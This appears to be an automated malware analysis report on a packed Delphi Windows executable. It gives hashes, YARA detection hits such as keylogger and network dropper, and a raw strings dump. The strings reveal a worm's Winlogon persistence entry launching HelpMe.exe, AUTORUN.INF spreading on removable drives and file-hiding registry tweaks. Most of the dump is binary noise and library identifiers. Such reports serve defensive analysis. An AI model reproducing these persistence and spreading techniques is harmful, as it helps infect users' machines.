Sample details: 02b67c1e15dee0401403c999080321c4 --

Hashes
MD5: 02b67c1e15dee0401403c999080321c4
SHA1: 9740b5270f8cdf9d30cb881dc347a07da3300690
SHA256: f15adea615dec619dbbb1d7675fc7e56dfe244bd0b5c431b7613fd18dbdcbe55
SSDEEP: 24576:TEtl9mRda1cSGB2uJ2s4otqFCJrW9FqvSbqsHasgXhFHDAGtlRXZ+CP63n0NuJvD:oEs1hN
Details
File Type: PE32
Yara Hits
YRP/Borland_Delphi_40_additional | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Borland_Delphi_30_additional | YRP/Borland_Delphi_30_ | YRP/Borland_Delphi_Setup_Module | YRP/Borland_Delphi_40 | YRP/Borland_Delphi_v40_v50 | YRP/BobSoft_Mini_Delphi_BoB_BobSoft_additional | YRP/Borland_Delphi_v60_v70 | YRP/Borland_Delphi_v30 | YRP/Borland_Delphi_DLL | YRP/Borland | YRP/BobSoftMiniDelphiBoBBobSoft | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasOverlay | YRP/borland_delphi | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Browsers | YRP/Dropper_Strings | YRP/SEH__vba | YRP/anti_dbg | YRP/network_dropper | YRP/screenshot | YRP/keylogger | YRP/spreading_file | YRP/win_mutex | YRP/win_registry | YRP/win_private_profile | YRP/win_files_operation | YRP/win_hook | YRP/Big_Numbers3 | YRP/Delphi_FormShow | YRP/Delphi_CompareCall | YRP/Delphi_Copy | YRP/Delphi_StrToInt | YRP/Delphi_DecodeDate | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/suspicious_packer_section | YRP/CAP_HookExKeylogger |
Strings
		This program must be run under Win32
[AspackDie!]
.idata
.rdata
.reloc
.aspack
.adata
Boolean
Integer
Cardinal
String
WideString
TObject
TObject
System
IInterface
System
TInterfacedObject
YZ]_^[
YZ]_^[
_^[YY]
YZ]_^[
C<"u1S
Q<"u8S
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
YZXtm1
ZTUWVSPRTj
tVSVWU
kernel32.dll
GetLongPathNameA
Software\Borland\Locales
Software\Borland\Delphi\Locales
_^[YY]
odSelected
odGrayed
odDisabled	odChecked	odFocused	odDefault
odHotLight
odInactive	odNoAccel
odNoFocusRect
odReserved1
odReserved2
odComboBoxEdit
Windows
TOwnerDrawState
Magellan MSWHEEL
MouseZ
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
	TFileName
TSearchRecX
	Exception
EHeapException
EOutOfMemory
EInOutError
	EExternal
EExternalException
	EIntError
EDivByZero
ERangeError
EIntOverflow
EMathError
EInvalidOp
EZeroDivide,x@
	EOverflow
EUnderflow
EInvalidPointer8y@
EInvalidCast
EConvertError
EAccessViolation
EPrivilege
EStackOverflow
	EControlC
EVariantError
EAssertionFailed
EAbstractError
EIntfCastError
EOSError
ESafecallException
SysUtils
SysUtils
TThreadLocalCounter
$TMultiReadExclusiveWriteSynchronizer
<*t"<0r=<9w9i
INFNAN
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
_^[YY]
t%HtIHtm
_^[YY]
$Z]_^[
QQQQQQSVW3
QQQQQSVW
_^[YY]
	TErrorRec
TExceptRec
YZ]_^[
m/d/yy
mmmm d, yyyy
:mm:ss
kernel32.dll
GetDiskFreeSpaceExA
(Z]_^[
oleaut32.dll
VariantChangeTypeEx
VarNeg
VarNot
VarAdd
VarSub
VarMul
VarDiv
VarIdiv
VarMod
VarAnd
VarXor
VarCmp
VarI4FromStr
VarR4FromStr
VarR8FromStr
VarDateFromStr
VarCyFromStr
VarBoolFromStr
VarBstrFromCy
VarBstrFromDate
VarBstrFromBool
TCustomVariantType
TCustomVariantType
Variants
EVariantInvalidOpError
EVariantTypeCastError
EVariantOverflowError
EVariantInvalidArgErrorp
EVariantBadVarTypeError
EVariantBadIndexError
EVariantArrayLockedError
EVariantArrayCreateError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantUnexpectedError8
EVariantDispatchError
_^[YY]
QQQQSV
Smallint
Integer
Single
Double
Currency
OleStr
Dispatch
Boolean
Variant
Unknown
Decimal
ShortInt
LongWord
String
Array 
ByRef 
Variants
_^[YY]
_^[YY]
tagEXCEPINFO 
TAlignment
taLeftJustify
taRightJustify
taCenter
Classes
	TBiDiMode
bdLeftToRight
bdRightToLeft
bdRightToLeftNoAlign
bdRightToLeftReadingOnly
Classes
ssShift
ssCtrl
ssLeft
ssRight
ssMiddle
ssDouble
Classes
TShiftState
THelpContext
	THelpType
	htKeyword	htContext
Classes
	TShortCut
TNotifyEvent
Sender
TObject
EStreamError
EFileStreamError
EFCreateError
EFOpenError
EFilerError8OA
EReadError
EWriteError
EClassNotFound
EResNotFound
EListError
EBitsError
EStringListError
EComponentError
EOutOfResourceshRA
EInvalidOperation
TThreadList
TPersistent
TPersistent
Classes
TInterfacedPersistent
TInterfacedPersistent
Classes
IStringsAdapter$
Classes
TStrings
TStrings
Classes
TStringItem
TStringList
TStringList
Classes
TStreamlXA
THandleStream
TFileStreamXYA
TCustomMemoryStream
TMemoryStream
TResourceStream
TStreamAdapter
TClassFinder
TFiler
TReader
EThread
TThread
TComponentName0^A
IDesignerNotify$
Classes
TComponent
TComponentX_A
Classes
TBasicActionLink
TBasicAction
TBasicAction8aA
Classes
TIdentMapEntry
	TRegGroup
TRegGroups
YZ]_^[
$Z]_^[
$Z]_^[
_^[YY]
	TIntConst
_^[YY]
Strings
S$_^[Y]
_^[YY]
SdZ]_^[
$Z]_^[
TPropFixup
TPropIntfFixup
_^[YY]
_^[YY]
Classes
_^[YY]
_^[YY]
QQQQQQQS
, <!@@M(n 
f8=<YOUT 
"ON 2.RO
  H   
/- B-/IN
KERNEL
re_sub_for
s_enab*0
!bqed">
0aDHell
6ource%
 r-cong
1m_cond
*re-inj
)obal_a
gGlobah
7mation
&alize
g:"Loc
evaria
gpopup
,alizi
*pups 
)izing
0ps_in
?ed":"
eIniti
g,"sin
5up_la
-eme_i
 me ID
$bel_m
&all":
! Call
'el_me
7gs":"
eArgum
i"labe
5_sett
gSetti
)abel_
7s":"T
6","la
*kies"
,es","
!elay"
<:","l
*nditi
ondit<
	dp>\/((
ym)12L5
	.:bal
_hiwab
	d_qni
_<"~in
_`ui-1G7
mlwe,Vw
-128`CH
ls3MP*
'WXfa:
ls3MP3
ggert[
itio8>
zf`lse,"theme_
d":106w
3ire":"med
3ponsive_min_width_unit":" 
b,.res
.siC%_aT8_g\$t|j5naAb:rB8"@
I(dPVc:z
u0HFc,V]4sTQ,_
{"CX/tqOat}$aYQ
p"+05-
%"(3!nimi"
p","animation_origin":"center 
0" "ovu	,ayj:ibQ%x2
Jb:4toXKPXWMpWTMN
delay":"0","theme_slug":"cutt-
'-idge2Wbid
v,2F,us
z"bZms1U!rNOl"
G--$wnUPS
zfalse,"disable_on_tablet":fal
l"oust
he\'hxj!udZb:rT,sm
bs3@/l
m#o{13
-_trigger":false,"position_fixi
b:jalsuWbovP2lmL
dyF!bxP$"2S!l#Wl"
S"lrgl
/n":false,"close_on_overlay_cl
+"6falc
l"cY/sij/nOP3cKE2e{Fb:6S,s	
]3eH*8>
,e_form_reopen":false,"disable
#cissir
,itLb:jT,su
bt|P-eW\$"j
H%"/g%
)dth_unit":"px","responsive_ma@
7ihth_e
l"s@3t{X
waQ4hr
CCn\[[
.":"center top","position_top"
q0<","q
)maA)obj4y`Pb:6S!dm
l"1\)m
m3p} 2CHKR[Dc^P
bcenter top","overlay_zindex":*
y95999)Bx",
:ibQ%x2
m"u`19
7MNk]R@g
'":"cutting-edge","id":1284,"s
'"6"sy}
.-s@4hiG,a~Qb}8
tablet":false,"custom_height_
4o.:fa|
%,"F#rcY,arY%_wZ.tm[4"jT!l
]3ic,9
0osition_fixed":false,"overlayg
)smbletYzfaY3e 
3tqV+avY%"2S!l#Wl"
^%_g &
jileH:
ustRh_j
^coC|el
-"pBxiv
_^[Y_]
Olx$co
n]h$XA
Eu<E4&
-&pGjd
8t=,#xh
XY]H]&
bAYm?D}
<7YG<X[C,
+K'lQDEuttBl
	{<t+(
(kttIn
ttLsO9 
>[P6tr
8c)||3
?]q0I*
=Wq:aOZ
Q_^[HPF$
lIq_^[C
j,->+;
3C\T0Ct
|,9@uY
<$d22GC0<C
;W2n	^s2
.rland\Delphi\Locales
_^[YY]
;IA@$Qgg
W$t?'s
odInactive	odNoAccel
4sFect
$ReF%rzP$1
Z$RqF%r~P$2^]$C
9Em=&b0.
TOwnerDrawState
t?wf,A
E$Y#Eu
4a~|,^
E|^w@3
+(1)HPM
Y]CzQ5$
rUtiBs
l2@F9_
Y/v=E1na|5cd
de0p4$
{v'cR)l@
Et:ROC
<m<!*h
$^u)Sh
uDM$v@
yYYYd	m
Xj98u`pvE
_^[YY]
vN1S]I
paLc)z4
	0tQX 
*v=@.a
0dOeeM&
;<P48R
c!+B&|
@drtzv
a@LPjUcr-;/
Yu8{P!
RhJ'R'
~/dYY]
LY^^[H
Fxu9+-
gJN3sD
tSk|ka
c$G)t-
a)Pt'@
C(Amu/
_^[YY]
_^[YY]
YZ]_^[
YZ]_^[
YZ]_^[
YZ]_^[
S8_^[]
t9;wlt4
FLVhp/D
t$;C8u
QQQQSVW
t#;^dt
BP_^[]
USER32
WINNLSEnableIME
imm32.dll
ImmGetContext
ImmReleaseContext
ImmGetConversionStatus
ImmSetConversionStatus
ImmSetOpenStatus
ImmSetCompositionWindow
ImmSetCompositionFontA
ImmGetCompositionStringA
ImmIsIME
ImmNotifyIME
Delphi%.8X
ControlOfs%.8X%.8X
USER32
AnimateWindow
TContainedAction
TContainedAction
ActnList
Category
TCustomActionList$DD
TCustomActionList
ActnList
TShortCutList
TShortCutList
ActnList
TCustomAction
TCustomAction
ActnList
TActionLinkSV
u*;~8u
R0Z_^[
;Blu	3
$:Cjt_
R0Z_^[
R0]_^[
$;Ctt?
R0Z_^[
R0Z_^[
R0Z_^[
R0Z_^[
R0]_^[
$Z]_^[
TChangeLinkDUD
TImageIndex
TCustomImageList
TCustomImageList
ImgList
S0_^[]
R ;C0|
R,;C4}!
S`]_^[
Bitmap
comctl32.dll
comctl32.dll
ImageList_WriteEx
EMenuError
TMenuBreak
mbNone
mbBreak
mbBarBreak
TMenuChangeEvent
Sender
TObject
Source	TMenuItem
Rebuild
Boolean
TMenuDrawItemEvent
Sender
TObject
ACanvas
TCanvas
Selected
Boolean
TAdvancedMenuDrawItemEvent
Sender
TObject
ACanvas
TCanvas
TOwnerDrawState
TMenuMeasureItemEvent
Sender
TObject
ACanvas
TCanvas
Integer
Height
Integer
TMenuItemAutoFlag
maAutomatic
maManual
maParent
MenusTnD
TMenuAutoFlag
TMenuActionLink
	TMenuItem8pD
	TMenuItem
Action
	AutoCheck
AutoHotkeys
AutoLineReduction8
Bitmap
Caption
Checked
SubMenuImages
Default
EnabledT
GroupIndex
HelpContext
Hint@UD
ImageIndex
	RadioItem
ShortCut
Visible
OnClick
OnDrawItem mD
OnAdvancedDrawItem
OnMeasureItem
TMenu,tD
	TMainMenu
	TMainMenu
AutoHotkeysPnD
AutoLineReduction
	AutoMerge
BiDiMode
Images
	OwnerDraw
ParentBiDiMode\lD
OnChange
TPopupAlignment
paLeft
paRight
paCenter
TTrackButton
tbRightButton
tbLeftButton
TMenuAnimations
maLeftToRight
maRightToLeft
maTopToBottom
maBottomToTop
maNone
TMenuAnimation
TPopupMenu
TPopupMenu
	AlignmentPnD
AutoHotkeysPnD
AutoLineReduction
	AutoPopup
BiDiMode
HelpContext
Images0wD
MenuAnimation
	OwnerDraw
ParentBiDiMode
TrackButton\lD
OnChange
OnPopup
TPopupList
TMenuItemStack
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
_^[YY]
Q<]_^[
ShortCutText
P?:S?u
Q<]_^[
@?:F?v
Q<]_^[
;~hu	3
$YZ]_^[
_^[YY]
Ih;J4u
YZ]_^[
TScrollBarInc
TScrollBarStyle
	ssRegular
ssFlat
ssHotTrack
TControlScrollBar
TControlScrollBar
ButtonSize
	Incrementh
Margin
ParentColor<
Position<
Smooth<
Style<
	ThumbSize
Tracking
Visible
TWindowState
wsNormal
wsMinimized
wsMaximized
TScrollingWinControl
TScrollingWinControlH
HorzScrollBar
VertScrollBar
TFormBorderStyle
bsNone
bsSingle
bsSizeable
bsDialog
bsToolWindow
bsSizeToolWin
Forms@
TBorderStyle
IDesignerHook,^A
Forms	
IOleForm$
TFormStyle
fsNormal
fsMDIChild	fsMDIForm
fsStayOnTop
TBorderIcon
biSystemMenu
biMinimize
biMaximize
biHelp
TBorderIcons
	TPosition
poDesigned	poDefault
poDefaultPosOnly
poDefaultSizeOnly
poScreenCenter
poDesktopCenter
poMainFormCenter
poOwnerFormCenter
Forms 
TDefaultMonitor
	dmDesktop	dmPrimary
dmMainForm
dmActiveForm
Formst
TPrintScale
poNone
poProportional
poPrintToFit
TCloseAction
caNone
caHide
caFree
caMinimize
TCloseEvent
Sender
TObject
Action
TCloseAction
TCloseQueryEvent
Sender
TObject
CanClose
Boolean
TShortCutEvent
TWMKey
Handled
Boolean
THelpEvent
Command
Integer
CallHelp
Boolean
Boolean
TCustomForm
TCustomForml
TFormp
FormsU
Action
ActiveControl<7C
AlphaBlendT
AlphaBlendValued>C
Anchors
AutoScroll
AutoSize
BiDiModeh
BorderIcons
BorderStyle
BorderWidth
Caption<
ClientHeight<
ClientWidth
TransparentColor
TransparentColorValue
Constraints
UseDockManager
DefaultMonitor
DockSite
DragKind8=C
DragMode
Enabled
ParentFontP
	FormStyle<
Height
HelpFile
HorzScrollBarp
KeyPreview
OldCreateOrder4pD
ObjectMenuItem
ParentBiDiMode<
PixelsPerInch
	PopupMenu
Positionp
PrintScale
Scaled
ScreenSnap
ShowHint<
SnapBuffer
VertScrollBar
Visible<
WindowState4pD
WindowMenu
OnActivate
OnCanResize
OnClick
OnCloseD
OnCloseQuerydEC
OnConstrainedResize
OnContextPopup
OnCreate
OnDblClick
	OnDestroy
OnDeactivate
OnDockDrop CC
OnDockOver
OnDragDrop,AC
OnDragOver\BC
	OnEndDockhDC
OnGetSiteInfo
OnHide
OnHelp
	OnKeyDown
OnKeyPress
OnKeyUp
OnMouseDown@@C
OnMouseMove
	OnMouseUp
OnMouseWheel|FC
OnMouseWheelDown|FC
OnMouseWheelUp
OnPaint
OnResize
OnShortCut
OnShow
OnStartDock
OnUnDock
TCustomDockFormP
TCustomDockForm
PixelsPerInch
TMonitor
TScreen
TScreen@
	THintInfo@
TApplication
TApplication
;X0t@S
+WH+W@
PixelsPerInch
TextHeight
IgnoreFontProperty
_^[YY]
S,_^[]
$Z]_^[
F(Z_^[
MDICLIENT
_^[YY]
_^[YY]
_^[YY]
Ch;Ctt
Cd;Cpt
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
layout text
f;sDtsf
CHYZ]_^[
_^[YY]
TApplication
MAINICON
XD;PHu
sx;P`u
;B0uGj
_^[YY]
vcltest3.dll
RegisterAutomation
$Z]_^[
~D_^[Y]
Y_^[Y]
YZ]_^[
User32.dll
SetLayeredWindowAttributes
TaskbarCreated
kernel32.dll
CreateToolhelp32Snapshot
Heap32ListFirst
Heap32ListNext
Heap32First
Heap32Next
Toolhelp32ReadProcessMemory
Process32First
Process32Next
Process32FirstW
Process32NextW
Thread32First
Thread32Next
Module32First
Module32Next
Module32FirstW
Module32NextW
	EOleError
EOleSysError
EOleException
Apartment
Neutral
ole32.dll
CoCreateInstanceEx
CoInitializeEx
CoAddRefServerProcess
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
QQQQQQQQSV
O'LNK'!
ntdll.dll
RtlInitUnicodeString
ZwOpenSection
CURRENT_USER
ThreadTimerT
ThreadLoopFile
FormCreate
	tmr1Timer
	TFrm_Main
	TFrm_Main
Un_Main
SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon
Explorer.exe  HelpMe.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue
\Soft.lnk
Stone,I hate you!
:\AutoRun.exe
:\AUTORUN.INF
AutoRun.exe
autorun
shell\1
shell\1\Command
Browser
shell\2\
shell\2\Command
shellexecute
HelpMe.exe
\HelpMe.exe
QQQQQQQSVW3
:\HelpMe.exe
:\AUTORUN.INF
HelpMe.exe
autorun
shell\1
shell\1\Command
Browser
shell\2\
shell\2\Command
shellexecute
Your disk is removed!
_^[YY]
\HelpMe.exe
\notepad.exe
Internet Explorer\iexplore.exe
Outlook Express\msimn.exe
qr333333333333333
33333333?333333
giW(39
383?35
333838
KRWb8`VA
33o3q333
2q3?33
32q323
[1q3!38
s@`"$33
&'q308
*7q:'$
7q38"$
:"$G6q3
Y35333
733868
333333
33338H
33333333
3 33wx
3533wx
1333f3332333?
233>fC333333
>1C233
fDFfC338
33>ffffc338
fff3;33
4DF334DC33
3;3*C03
3*C333
33338?383
F"F333383
"$a323
33;3<3;
CjC338
D*C'3383
C3s333833?23
3353330
4334IC33233348?303
C3333332
L36!<33
33333333
As3/Cs3WCs3
$Wqr3/qr
}33dr3
bC'qr3
v3gKb$
{"Oqr3_As8+fA
cc*r@c$
"DDB""$3
3:"""""
333333
333333333333333333
333333333333333333
333333333333
334C33333338
33B$3333333
34""C33333833
3B""$33333
4"*""C3338
"C3338
:*3:"$3338
3333:"$3333338
"C333333
33333:"$3333338
333333
"C333333
333333:"C3333338
3333333
#3333333
3333333:3333333383
333333333333333333
33333333
nEld2Ad
e&rct+c
calSection
VirtualFree
VirtuazALlBc 
jeTC1r
wi0e"h
r8o(uLt
rZE6Ao
e(igr#r
Ci)d1l
@x&t<r
e1hve5de
;rmt"F
pwi=n#i
RtlUnwind
RaiseException
dLa"d	ef
sgrf2^dilR
d tqi*g$
Ke s	g
Fh"r:e
Jdra1i_2ZdGl 
lEa<tP2Ad
Avl;c6t
ALlHc%
2Ld	li
eqK!y*x"
l^2KdIlE
t#orSingleObject
VirtualQuery
O`FOl$
LkcGl$
?e~F'lCP
 evu>e$h
dEi)en
MultiByteToWideChar
MulDiv
VoeQO4F
!ehv(C
l&nio*kc
5ldb(l(r
epegt6me
DlIb/l.lno,
GlobalAddAtomA
GetVersionExA
e0T!rEa'L
SJo1t1a
l1izeS
oUr$er
lAcKe*D
cRe e*tI
dde9tfi
#iLe=i
Cn6m"a
r%nbog
eqCTi:i
aiSCc<i
BeJe7e*i
DeleteCriticalSection
CreateThrexdB
e6iLe(
*o	pvr,S
>eTR=PW
 eTD'B,o
4efB"M
4e	eCt#a
re*t;i
yl'y$n
(a?k+l
"eTD>B
geSDfO
GetBrushOrgEx
GetBitmapBits
7eLe\eaCd
'rLaie
e7Ibi\mDpd
$aIt?e
e.iud)wa
nTltt7M
PxpPp>e@uS
=hOw!w
Tsm5rr
RAnBes
WSnDoR
7eTC0r
!eNCLiUb
aRdlaQad
SetClassLongA
SetCapture
SenA t
r.l$s0Ah
?t'n;e
4eEkieVs
f)s1tre
gzB$eP
)aPVLr
d8e\b#a
?i	l'iMeZ
tVe-u(t
nFoYTHr@a
WInFoRR
S]sSeJM@n
GetMenuState
GetMenuItemInfoA
#ewL5s
geSD@s
GetCursorPos
GetCursoq
dGa;ac
Oe2C	a
>eqC,p
?rem/R
Bi$d"i
7qra#R
m%ifd!w
dWindows
EndPaint
EnableWindow
w:eXt'
w;c	n$xc
M7I0hIl
e#eNum
e,cOn'
0lHsKCLiUb
ca/l!e
t-oUkex%
lejidPDi
BUf)AS
-hAr3p
r:oLe+Ae
t%imd.w"e
8cwi<a
e%ezb%a
d ayout
kernel32.dll
oleaut
lP2Ed	ld
_6eAdv
g@LGsL_<rHgGoSes
_0rAg3n
,mAgMLLs
_reEoSes
L@sT_;e
gELAsQ_2dM
Lys=_*e
hql%3\.
:H#eTS
/D9A$I
2]D9Lp
s,n%cLAv
HelpMe
'KillandHide
(ShlObj
System
SysInit
KWindows
UTypes
sActiveX
3Messages
CommCtrl
*ShellAPI
RegStr
?WinInet
UrlMon
FComObj
qComConst
CVariants
SysConst
$VarUtils
SysUtils
Dialogs
ExtCtrls
Consts
5Themes
nComCtrls
Printers
WWinSpool
^Classes
"RTLConsts
QTypInfo
+Graphics
FlatSB
StdActns
Clipbrd
YStrUtils
&Controls
MultiMon
vMenus
Contnrs
ImgList
EActnList
dStdCtrls
WinHelpViewer
RHelpIntfs
ComStrs
ExtActns
ExtDlgs
3CommDlg
Buttons
8Registry
IniFiles
CUxTheme
SyncObjs
RichEdit
ToolWin
ListActns
AAccCtrl
AclAPI
TlHelp32
Un_Main
TPF0	TFrm_Main
Frm_Main
AlphaBlend	
AlphaBlendValue
BorderIcons
BorderStyle
bsNone
ClientHeight
ClientWidth
	clBtnFace
Font.Charset
DEFAULT_CHARSET
Font.Color
clWindowText
Font.Height
	Font.Name
MS Sans Serif
Font.Style
OldCreateOrder
Position
poScreenCenter
OnCreate
FormCreate
PixelsPerInch
TextHeight
Height
TabOrder
TTimer
Interval
OnTimer
	tmr1Timer
VirtualAlloc
VirtualFree
kernel32.dll
ExitProcess
user32.dll
MessageBoxA
wsprintfA
LOADER ERROR
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
 (08@P`p
kernel32.dll
GetProcAddress
GetModuleHandleA
LoadLibraryA
user32.dll
advapi32.dll
oleaut32.dll
advapi32.dll
version.dll
gdi32.dll
user32.dll
oleaut32.dll
ole32.dll
oleaut32.dll
comctl32.dll
shell32.dll
advapi32.dll
GetKeyboardType
RegQueryValueExA
SysFreeString
RegSetValueExA
VerQueryValueA
UnrealizeObject
CreateWindowExA
SafeArrayPtrOfIndex
OleUninitialize
GetErrorInfo
ImageList_SetIconSize
SHGetSpecialFolderLocation
SetSecurityInfo
Microsoft at Work~.feed-ms
# NOTE: Derived from ../../lib/POSIX.pm.
# Changes made here will be lost when autosplit is run again.
# See AutoSplit.pm.
package POSIX;
#line 642 "../../lib/POSIX.pm (autosplit into ../../lib/auto/POSIX/execv.al)"
sub execv {
    unimpl "execv() is C-specific, stopped";
# end of POSIX::execv
execv.al
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
D$ Pj@
;T$|sF
L$LQWS
u._^]3
u=_^][
T$0WSQUR
f	U4_^][
L$0WSRUQ
f	M4_^][
f	U4_^]
33333333333333
3333333
 !"#$%&'33()3333*333+33,-./0312
@Ww@t,
HHtXHHt
?If90t
uTVWhD
j@j ^V
< tK<	tG
v	N+D$
HHtYHHt
^SSSSS
URPQQh`
t"SS9] u
;t$,v-
UQPXY]Y[
PPPPPPPP
PPPPPPPP
PostTrampSize %d
YWORD 
DQWORD 
TBYTE 
QWORD 
DWORD 
 ;NOT TAKEN
 ;TAKEN
REPNZ 
UNDEFINED
CALL FAR
LOOPNZ
JMP FAR
SYSCALL
SYSRET
WBINVD
SYSENTER
SYSEXIT
GETSEC
CMOVNO
CMOVAE
CMOVNZ
CMOVBE
CMOVNS
CMOVNP
CMOVGE
CMOVLE
CMPXCHG
MOVNTI
INVLPG
VMCALL
VMLAUNCH
VMRESUME
VMXOFF
MONITOR
XGETBV
XSETBV
VMMCALL
VMLOAD
VMSAVE
SKINIT
INVLPGA
SWAPGS
RDTSCP
PREFETCH
PREFETCHW
PFNACC
PFPNACC
PFCMPGE
PFRSQRT
PFCMPGT
PFRCPIT1
PFRSQIT1
PFSUBR
PFCMPEQ
PFRCPIT2
PMULHRW
PSWAPD
PAVGUSB
MOVUPS
MOVUPD
VMOVSS
VMOVSD
VMOVUPS
VMOVUPD
MOVHLPS
MOVLPS
MOVLPD
MOVSLDUP
MOVDDUP
VMOVHLPS
VMOVLPS
VMOVLPD
VMOVSLDUP
VMOVDDUP
UNPCKLPS
UNPCKLPD
VUNPCKLPS
VUNPCKLPD
UNPCKHPS
UNPCKHPD
VUNPCKHPS
VUNPCKHPD
MOVLHPS
MOVHPS
MOVHPD
MOVSHDUP
VMOVLHPS
VMOVHPS
VMOVHPD
VMOVSHDUP
PREFETCHNTA
PREFETCHT0
PREFETCHT1
PREFETCHT2
MOVAPS
MOVAPD
VMOVAPS
VMOVAPD
CVTPI2PS
CVTPI2PD
CVTSI2SS
CVTSI2SD
VCVTSI2SS
VCVTSI2SD
MOVNTPS
MOVNTPD
MOVNTSS
MOVNTSD
VMOVNTPS
VMOVNTPD
CVTTPS2PI
CVTTPD2PI
CVTTSS2SI
CVTTSD2SI
VCVTTSS2SI
VCVTTSD2SI
CVTPS2PI
CVTPD2PI
CVTSS2SI
CVTSD2SI
VCVTSS2SI
VCVTSD2SI
UCOMISS
UCOMISD
VUCOMISS
VUCOMISD
COMISS
COMISD
VCOMISS
VCOMISD
PSHUFB
VPSHUFB
PHADDW
VPHADDW
PHADDD
VPHADDD
PHADDSW
VPHADDSW
PMADDUBSW
VPMADDUBSW
PHSUBW
VPHSUBW
PHSUBD
VPHSUBD
PHSUBSW
VPHSUBSW
PSIGNB
VPSIGNB
PSIGNW
VPSIGNW
PSIGND
VPSIGND
PMULHRSW
VPMULHRSW
VPERMILPS
VPERMILPD
VPTESTPS
VPTESTPD
PBLENDVB
BLENDVPS
BLENDVPD
VPTEST
VBROADCASTSS
VBROADCASTSD
VBROADCASTF128
VPABSB
VPABSW
VPABSD
PMOVSXBW
VPMOVSXBW
PMOVSXBD
VPMOVSXBD
PMOVSXBQ
VPMOVSXBQ
PMOVSXWD
VPMOVSXWD
PMOVSXWQ
VPMOVSXWQ
PMOVSXDQ
VPMOVSXDQ
PMULDQ
VPMULDQ
PCMPEQQ
VPCMPEQQ
MOVNTDQA
VMOVNTDQA
PACKUSDW
VPACKUSDW
VMASKMOVPS
VMASKMOVPD
PMOVZXBW
VPMOVZXBW
PMOVZXBD
VPMOVZXBD
PMOVZXBQ
VPMOVZXBQ
PMOVZXWD
VPMOVZXWD
PMOVZXWQ
VPMOVZXWQ
PMOVZXDQ
VPMOVZXDQ
PCMPGTQ
VPCMPGTQ
PMINSB
VPMINSB
PMINSD
VPMINSD
PMINUW
VPMINUW
PMINUD
VPMINUD
PMAXSB
VPMAXSB
PMAXSD
VPMAXSD
PMAXUW
VPMAXUW
PMAXUD
VPMAXUD
PMULLD
VPMULLD
PHMINPOSUW
VPHMINPOSUW
INVEPT
INVVPID
VFMADDSUB132PS
VFMADDSUB132PD
VFMSUBADD132PS
VFMSUBADD132PD
VFMADD132PS
VFMADD132PD
VFMADD132SS
VFMADD132SD
VFMSUB132PS
VFMSUB132PD
VFMSUB132SS
VFMSUB132SD
VFNMADD132PS
VFNMADD132PD
VFNMADD132SS
VFNMADD132SD
VFNMSUB132PS
VFNMSUB132PD
VFNMSUB132SS
VFNMSUB132SD
VFMADDSUB213PS
VFMADDSUB213PD
VFMSUBADD213PS
VFMSUBADD213PD
VFMADD213PS
VFMADD213PD
VFMADD213SS
VFMADD213SD
VFMSUB213PS
VFMSUB213PD
VFMSUB213SS
VFMSUB213SD
VFNMADD213PS
VFNMADD213PD
VFNMADD213SS
VFNMADD213SD
VFNMSUB213PS
VFNMSUB213PD
VFNMSUB213SS
VFNMSUB213SD
VFMADDSUB231PS
VFMADDSUB231PD
VFMSUBADD231PS
VFMSUBADD231PD
VFMADD231PS
VFMADD231PD
VFMADD231SS
VFMADD231SD
VFMSUB231PS
VFMSUB231PD
VFMSUB231SS
VFMSUB231SD
VFNMADD231PS
VFNMADD231PD
VFNMADD231SS
VFNMADD231SD
VFNMSUB231PS
VFNMSUB231PD
VFNMSUB231SS
VFNMSUB231SD
AESIMC
VAESIMC
AESENC
VAESENC
AESENCLAST
VAESENCLAST
AESDEC
VAESDEC
AESDECLAST
VAESDECLAST
VPERM2F128
ROUNDPS
VROUNDPS
ROUNDPD
VROUNDPD
ROUNDSS
VROUNDSS
ROUNDSD
VROUNDSD
BLENDPS
VBLENDPS
BLENDPD
VBLENDPD
PBLENDW
VPBLENDVW
PALIGNR
VPALIGNR
PEXTRB
VPEXTRB
PEXTRW
VPEXTRW
PEXTRD
PEXTRQ
VPEXTRD
EXTRACTPS
VEXTRACTPS
VINSERTF128
VEXTRACTF128
PINSRB
VPINSRB
INSERTPS
VINSERTPS
PINSRD
PINSRQ
VPINSRD
VPINSRQ
MPSADBW
VMPSADBW
PCLMULQDQ
VPCLMULQDQ
VBLENDVPS
VBLENDVPD
VPBLENDVB
PCMPESTRM
VPCMPESTRM
PCMPESTRI
VCMPESTRI
PCMPISTRM
VPCMPISTRM
PCMPISTRI
VPCMPISTRI
AESKEYGENASSIST
VAESKEYGENASSIST
MOVMSKPS
MOVMSKPD
VMOVMSKPS
VMOVMSKPD
SQRTPS
SQRTPD
SQRTSS
SQRTSD
VSQRTSS
VSQRTSD
VSQRTPS
VSQRTPD
RSQRTPS
RSQRTSS
VRSQRTSS
VRSQRTPS
VRCPSS
VRCPPS
VANDPS
VANDPD
ANDNPS
ANDNPD
VANDNPS
VANDNPD
VXORPS
VXORPD
VADDPS
VADDPD
VADDSS
VADDSD
VMULPS
VMULPD
VMULSS
VMULSD
CVTPS2PD
CVTPD2PS
CVTSS2SD
CVTSD2SS
VCVTSS2SD
VCVTSD2SS
VCVTPS2PD
VCVTPD2PS
CVTDQ2PS
CVTPS2DQ
CVTTPS2DQ
VCVTDQ2PS
VCVTPS2DQ
VCVTTPS2DQ
VSUBPS
VSUBPD
VSUBSS
VSUBSD
VMINPS
VMINPD
VMINSS
VMINSD
VDIVPS
VDIVPD
VDIVSS
VDIVSD
VMAXPS
